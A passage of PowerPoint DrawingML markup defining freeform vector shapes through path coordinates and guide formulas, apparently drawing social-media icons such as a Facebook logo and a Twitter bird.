                <a:lnTo>
                  <a:pt x="1338" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="1432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1434" y="1390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1483" y="1348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1483" y="1348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1462" y="1348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1462" y="1348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1449" y="1341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1449" y="1341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="1334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="1334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1407" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1407" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1379" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1379" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1344" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1344" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1157" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1157" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1144" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1144" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="1327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="1327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="1411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="1446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="1494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="1494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="1522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="1522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="1543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="1543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="156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Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1792767" y="3645126"/>
            <a:ext cx="397974" cy="397301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1498 w 1845"/>
              <a:gd name="T1" fmla="*/ 0 h 1718"/>
              <a:gd name="T2" fmla="*/ 1629 w 1845"/>
              <a:gd name="T3" fmla="*/ 21 h 1718"/>
              <a:gd name="T4" fmla="*/ 1741 w 1845"/>
              <a:gd name="T5" fmla="*/ 98 h 1718"/>
              <a:gd name="T6" fmla="*/ 1789 w 1845"/>
              <a:gd name="T7" fmla="*/ 146 h 1718"/>
              <a:gd name="T8" fmla="*/ 1837 w 1845"/>
              <a:gd name="T9" fmla="*/ 257 h 1718"/>
              <a:gd name="T10" fmla="*/ 1844 w 1845"/>
              <a:gd name="T11" fmla="*/ 1397 h 1718"/>
              <a:gd name="T12" fmla="*/ 1837 w 1845"/>
              <a:gd name="T13" fmla="*/ 1460 h 1718"/>
              <a:gd name="T14" fmla="*/ 1789 w 1845"/>
              <a:gd name="T15" fmla="*/ 1571 h 1718"/>
              <a:gd name="T16" fmla="*/ 1741 w 1845"/>
              <a:gd name="T17" fmla="*/ 1619 h 1718"/>
              <a:gd name="T18" fmla="*/ 1629 w 1845"/>
              <a:gd name="T19" fmla="*/ 1696 h 1718"/>
              <a:gd name="T20" fmla="*/ 1498 w 1845"/>
              <a:gd name="T21" fmla="*/ 1717 h 1718"/>
              <a:gd name="T22" fmla="*/ 1269 w 1845"/>
              <a:gd name="T23" fmla="*/ 1049 h 1718"/>
              <a:gd name="T24" fmla="*/ 1547 w 1845"/>
              <a:gd name="T25" fmla="*/ 793 h 1718"/>
              <a:gd name="T26" fmla="*/ 1269 w 1845"/>
              <a:gd name="T27" fmla="*/ 626 h 1718"/>
              <a:gd name="T28" fmla="*/ 1276 w 1845"/>
              <a:gd name="T29" fmla="*/ 571 h 1718"/>
              <a:gd name="T30" fmla="*/ 1297 w 1845"/>
              <a:gd name="T31" fmla="*/ 536 h 1718"/>
              <a:gd name="T32" fmla="*/ 1317 w 1845"/>
              <a:gd name="T33" fmla="*/ 522 h 1718"/>
              <a:gd name="T34" fmla="*/ 1373 w 1845"/>
              <a:gd name="T35" fmla="*/ 508 h 1718"/>
              <a:gd name="T36" fmla="*/ 1553 w 1845"/>
              <a:gd name="T37" fmla="*/ 501 h 1718"/>
              <a:gd name="T38" fmla="*/ 1553 w 1845"/>
              <a:gd name="T39" fmla="*/ 271 h 1718"/>
              <a:gd name="T40" fmla="*/ 1346 w 1845"/>
              <a:gd name="T41" fmla="*/ 257 h 1718"/>
              <a:gd name="T42" fmla="*/ 1262 w 1845"/>
              <a:gd name="T43" fmla="*/ 264 h 1718"/>
              <a:gd name="T44" fmla="*/ 1137 w 1845"/>
              <a:gd name="T45" fmla="*/ 313 h 1718"/>
              <a:gd name="T46" fmla="*/ 1082 w 1845"/>
              <a:gd name="T47" fmla="*/ 348 h 1718"/>
              <a:gd name="T48" fmla="*/ 1005 w 1845"/>
              <a:gd name="T49" fmla="*/ 459 h 1718"/>
              <a:gd name="T50" fmla="*/ 985 w 1845"/>
              <a:gd name="T51" fmla="*/ 605 h 1718"/>
              <a:gd name="T52" fmla="*/ 742 w 1845"/>
              <a:gd name="T53" fmla="*/ 793 h 1718"/>
              <a:gd name="T54" fmla="*/ 985 w 1845"/>
              <a:gd name="T55" fmla="*/ 1049 h 1718"/>
              <a:gd name="T56" fmla="*/ 347 w 1845"/>
              <a:gd name="T57" fmla="*/ 1717 h 1718"/>
              <a:gd name="T58" fmla="*/ 278 w 1845"/>
              <a:gd name="T59" fmla="*/ 1710 h 1718"/>
              <a:gd name="T60" fmla="*/ 153 w 1845"/>
              <a:gd name="T61" fmla="*/ 1661 h 1718"/>
              <a:gd name="T62" fmla="*/ 98 w 1845"/>
              <a:gd name="T63" fmla="*/ 1619 h 1718"/>
              <a:gd name="T64" fmla="*/ 21 w 1845"/>
              <a:gd name="T65" fmla="*/ 1515 h 1718"/>
              <a:gd name="T66" fmla="*/ 0 w 1845"/>
              <a:gd name="T67" fmla="*/ 1397 h 1718"/>
              <a:gd name="T68" fmla="*/ 0 w 1845"/>
              <a:gd name="T69" fmla="*/ 320 h 1718"/>
              <a:gd name="T70" fmla="*/ 21 w 1845"/>
              <a:gd name="T71" fmla="*/ 202 h 1718"/>
              <a:gd name="T72" fmla="*/ 98 w 1845"/>
              <a:gd name="T73" fmla="*/ 98 h 1718"/>
              <a:gd name="T74" fmla="*/ 153 w 1845"/>
              <a:gd name="T75" fmla="*/ 56 h 1718"/>
              <a:gd name="T76" fmla="*/ 278 w 1845"/>
              <a:gd name="T77" fmla="*/ 7 h 1718"/>
              <a:gd name="T78" fmla="*/ 1498 w 1845"/>
              <a:gd name="T79" fmla="*/ 0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45" h="1718">
                <a:moveTo>
                  <a:pt x="1498" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1498" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1567" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1692" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1789" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1817" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1844" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1844" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1844" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1817" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1789" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1692" y="1661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="1696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1567" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="1049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="1049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1547" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1276" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1290" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297" y="536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297" y="536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1408" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1553" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1553" y="271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1553" y="271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1193" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1082" y="348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1082" y="348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742" y="1049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="1049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="1696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="1661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="0"/>
                </a:ln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Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1787057" y="3219017"/>
            <a:ext cx="409399" cy="329047"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1851 w 1894"/>
              <a:gd name="T1" fmla="*/ 223 h 1426"/>
              <a:gd name="T2" fmla="*/ 1699 w 1894"/>
              <a:gd name="T3" fmla="*/ 355 h 1426"/>
              <a:gd name="T4" fmla="*/ 1699 w 1894"/>
              <a:gd name="T5" fmla="*/ 403 h 1426"/>
              <a:gd name="T6" fmla="*/ 1671 w 1894"/>
              <a:gd name="T7" fmla="*/ 619 h 1426"/>
              <a:gd name="T8" fmla="*/ 1629 w 1894"/>
              <a:gd name="T9" fmla="*/ 764 h 1426"/>
              <a:gd name="T10" fmla="*/ 1511 w 1894"/>
              <a:gd name="T11" fmla="*/ 966 h 1426"/>
              <a:gd name="T12" fmla="*/ 1414 w 1894"/>
              <a:gd name="T13" fmla="*/ 1091 h 1426"/>
              <a:gd name="T14" fmla="*/ 1289 w 1894"/>
              <a:gd name="T15" fmla="*/ 1202 h 1426"/>
              <a:gd name="T16" fmla="*/ 1067 w 1894"/>
              <a:gd name="T17" fmla="*/ 1334 h 1426"/>
              <a:gd name="T18" fmla="*/ 888 w 1894"/>
              <a:gd name="T19" fmla="*/ 1390 h 1426"/>
              <a:gd name="T20" fmla="*/ 596 w 1894"/>
              <a:gd name="T21" fmla="*/ 1425 h 1426"/>
              <a:gd name="T22" fmla="*/ 436 w 1894"/>
              <a:gd name="T23" fmla="*/ 1418 h 1426"/>
              <a:gd name="T24" fmla="*/ 208 w 1894"/>
              <a:gd name="T25" fmla="*/ 1363 h 1426"/>
              <a:gd name="T26" fmla="*/ 0 w 1894"/>
              <a:gd name="T27" fmla="*/ 1265 h 1426"/>
              <a:gd name="T28" fmla="*/ 90 w 1894"/>
              <a:gd name="T29" fmla="*/ 1272 h 1426"/>
              <a:gd name="T30" fmla="*/ 284 w 1894"/>
              <a:gd name="T31" fmla="*/ 1251 h 1426"/>
              <a:gd name="T32" fmla="*/ 465 w 1894"/>
              <a:gd name="T33" fmla="*/ 1181 h 1426"/>
              <a:gd name="T34" fmla="*/ 576 w 1894"/>
              <a:gd name="T35" fmla="*/ 1119 h 1426"/>
              <a:gd name="T36" fmla="*/ 395 w 1894"/>
              <a:gd name="T37" fmla="*/ 1077 h 1426"/>
              <a:gd name="T38" fmla="*/ 298 w 1894"/>
              <a:gd name="T39" fmla="*/ 1007 h 1426"/>
              <a:gd name="T40" fmla="*/ 208 w 1894"/>
              <a:gd name="T41" fmla="*/ 868 h 1426"/>
              <a:gd name="T42" fmla="*/ 284 w 1894"/>
              <a:gd name="T43" fmla="*/ 868 h 1426"/>
              <a:gd name="T44" fmla="*/ 389 w 1894"/>
              <a:gd name="T45" fmla="*/ 861 h 1426"/>
              <a:gd name="T46" fmla="*/ 208 w 1894"/>
              <a:gd name="T47" fmla="*/ 778 h 1426"/>
              <a:gd name="T48" fmla="*/ 124 w 1894"/>
              <a:gd name="T49" fmla="*/ 682 h 1426"/>
              <a:gd name="T50" fmla="*/ 77 w 1894"/>
              <a:gd name="T51" fmla="*/ 508 h 1426"/>
              <a:gd name="T52" fmla="*/ 117 w 1894"/>
              <a:gd name="T53" fmla="*/ 522 h 1426"/>
              <a:gd name="T54" fmla="*/ 249 w 1894"/>
              <a:gd name="T55" fmla="*/ 550 h 1426"/>
              <a:gd name="T56" fmla="*/ 180 w 1894"/>
              <a:gd name="T57" fmla="*/ 487 h 1426"/>
              <a:gd name="T58" fmla="*/ 124 w 1894"/>
              <a:gd name="T59" fmla="*/ 418 h 1426"/>
              <a:gd name="T60" fmla="*/ 77 w 1894"/>
              <a:gd name="T61" fmla="*/ 293 h 1426"/>
              <a:gd name="T62" fmla="*/ 77 w 1894"/>
              <a:gd name="T63" fmla="*/ 195 h 1426"/>
              <a:gd name="T64" fmla="*/ 132 w 1894"/>
              <a:gd name="T65" fmla="*/ 63 h 1426"/>
              <a:gd name="T66" fmla="*/ 291 w 1894"/>
              <a:gd name="T67" fmla="*/ 216 h 1426"/>
              <a:gd name="T68" fmla="*/ 485 w 1894"/>
              <a:gd name="T69" fmla="*/ 327 h 1426"/>
              <a:gd name="T70" fmla="*/ 811 w 1894"/>
              <a:gd name="T71" fmla="*/ 432 h 1426"/>
              <a:gd name="T72" fmla="*/ 922 w 1894"/>
              <a:gd name="T73" fmla="*/ 396 h 1426"/>
              <a:gd name="T74" fmla="*/ 929 w 1894"/>
              <a:gd name="T75" fmla="*/ 285 h 1426"/>
              <a:gd name="T76" fmla="*/ 1033 w 1894"/>
              <a:gd name="T77" fmla="*/ 105 h 1426"/>
              <a:gd name="T78" fmla="*/ 1158 w 1894"/>
              <a:gd name="T79" fmla="*/ 21 h 1426"/>
              <a:gd name="T80" fmla="*/ 1310 w 1894"/>
              <a:gd name="T81" fmla="*/ 0 h 1426"/>
              <a:gd name="T82" fmla="*/ 1532 w 1894"/>
              <a:gd name="T83" fmla="*/ 63 h 1426"/>
              <a:gd name="T84" fmla="*/ 1657 w 1894"/>
              <a:gd name="T85" fmla="*/ 98 h 1426"/>
              <a:gd name="T86" fmla="*/ 1837 w 1894"/>
              <a:gd name="T87" fmla="*/ 28 h 1426"/>
              <a:gd name="T88" fmla="*/ 1775 w 1894"/>
              <a:gd name="T89" fmla="*/ 139 h 1426"/>
              <a:gd name="T90" fmla="*/ 1671 w 1894"/>
              <a:gd name="T91" fmla="*/ 223 h 1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894" h="1426">
                <a:moveTo>
                  <a:pt x="1893" y="167"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1893" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1851" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802" y="271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1754" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1684" y="550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1650" y="689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1650" y="689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594" y="834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559" y="903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463" y="1036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1414" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352" y="1154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="1202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="1202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1151" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="1334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="1369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="1369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888" y="1390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797" y="1411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436" y="1418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353" y="1404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="1390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="1363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139" y="1334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465" y="1181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="1154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="1077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="868"/>
